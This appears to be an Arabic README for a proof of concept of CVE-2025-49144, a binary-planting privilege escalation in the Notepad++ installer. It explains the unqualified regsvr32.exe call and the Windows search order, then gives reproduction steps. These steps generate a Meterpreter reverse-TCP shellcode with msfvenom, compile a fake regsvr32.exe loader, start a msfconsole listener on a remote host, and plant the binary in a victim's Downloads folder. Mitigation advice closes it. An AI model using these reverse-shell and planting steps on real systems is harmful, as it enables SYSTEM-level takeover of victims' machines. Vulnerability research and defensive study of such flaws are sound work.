
CVE-2025-49144 * Notepad++ v8.8.1 * POC على مستوى SYSTEM
CVE-2025-49144 * Notepad++ v8.8.1 * PoC على مستوى SYSTEM

📌 CVE-2025-49144 هي ثغرة تصعيد صلاحيات محلية عالية الخطورة موجودة في برامج تثبيت Notepad++ الإصدار v8.8.1 والإصدارات السابقة. تنبع هذه الثغرة من سلوك مسار البحث عن الملفات التنفيذية غير المتحكم به أثناء التثبيت، مما يسمح لمهاجم محلي بالحصول على صلاحيات على مستوى SYSTEM بوضع ملفات تنفيذية خبيثة في نفس مجلد المثبت.
⚙️ كيف تعمل هذه الثغرة – خطوة بخطوة:
🧱 1. ما الخطأ في المثبت؟
مثبت Notepad++ (قبل الإصدار v8.8.2) يستدعي regsvr32.exe لتسجيل بعض المكونات — لكنه يفعل ذلك دون تحديد المسار الكامل (مثل C:\Windows\System32\regsvr32.exe).
بدلاً من ذلك، يقوم فقط بتشغيل:
regsvr32.exe some_dll
📂 2. سلوك مسار البحث في Windows: عند تشغيل ملف تنفيذي دون مسار كامل، يستخدم Windows ترتيب بحث محددًا للعثور على الملف:
المجلد الذي تم تشغيل التطبيق منه (مثل Downloads)
مجلد النظام (System32)
مجلد Windows
دليل العمل الحالي
المسارات المتغيرة في متغير البيئة PATH
لذا، إذا تم وضع regsvr32.exe مزيف في نفس مجلد المثبت (مثل Downloads)، فسيستخدمه Windows قبل الملف الحقيقي.
💣 3. الاستغلال:
يضع المهاجم ملف regsvr32.exe خبيثًا في نفس مجلد مثبت Notepad++ الشرعي (على سبيل المثال، مجلد Downloads الخاص بالضحية).
تشغّل الضحية المثبت (معتقدة أنه آمن).
يستدعي المثبت regsvr32.exe، لكنه ينفذ في النهاية الملف الخبيث من نفس المجلد — بصلاحيات SYSTEM (لأن المثبتات عادةً ما تطلب أذونات المسؤول).
حمولة المهاجم تعمل الآن بصلاحيات NT AUTHORITY\SYSTEM.
⚙️ خطوات إعادة الإنتاج:
احصل على كود الشل: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f c > shellcode.txt
قم بتنزيل الملف "regsvr32_loader.c" وقم بتحريره. الصق كود الشل بالكامل من shellcode.txt في التعليق المذكور. قم بترجمته إلى regsvr32.exe: x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows
شغّل مستمع meterpreter: msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.9 set LPORT 4444 run
قم بتنزيل إصدار ضعيف من Notepad++ أي إصدار سابق للإصدار 8.8.1 لأن 8.8.1 يتم تحديثه الآن تلقائيًا. لقد استخدمت Notepad++ v8.6.8 من أجل الإثبات (PoC). انقل الملف "regsvr32.exe" إلى نظام Windows في نفس مجلد مثبت notepad++، غالبًا في مجلد Downloads. أكمل تثبيت مثبت Notepad++. ملاحظة: هذا إثبات (PoC) لذلك تم اختباره مع تعطيل Windows Defender والحماية في الوقت الفعلي.
✅ التخفيف
يجب على المستخدمين والمسؤولين:
ترقية Notepad++ إلى v8.8.2 أو أحدث
تقييد تثبيت البرامج على مسؤولين موثوقين
استخدام AppLocker أو WDAC أو سياسات تقييد البرامج (SRP) من أجل:
منع التنفيذ من المجلدات القابلة للكتابة من قبل المستخدم (مثل Downloads) منع تنفيذ الملفات الثنائية غير الموثوقة مثل regsvr32.exe من مسارات غير مصرح بها فرض توقيع الشيفرة للملفات التنفيذية يجب على فرق الأمان مراجعة مسارات التثبيت بانتظام، ومراقبة أذونات الكتابة، وملاحظة السلوك أثناء تنفيذ المثبت لتقليل سطح الهجوم.
🏷️ الترخيص رخصة MIT — مجانية للأغراض التعليمية والبحثية والدفاعية فقط.
🤝 المساهمة طلبات السحب (Pull Requests) مرحب بها — حسّن الاكتشاف، أو أضف ميزات، أو اقترح إصلاحات.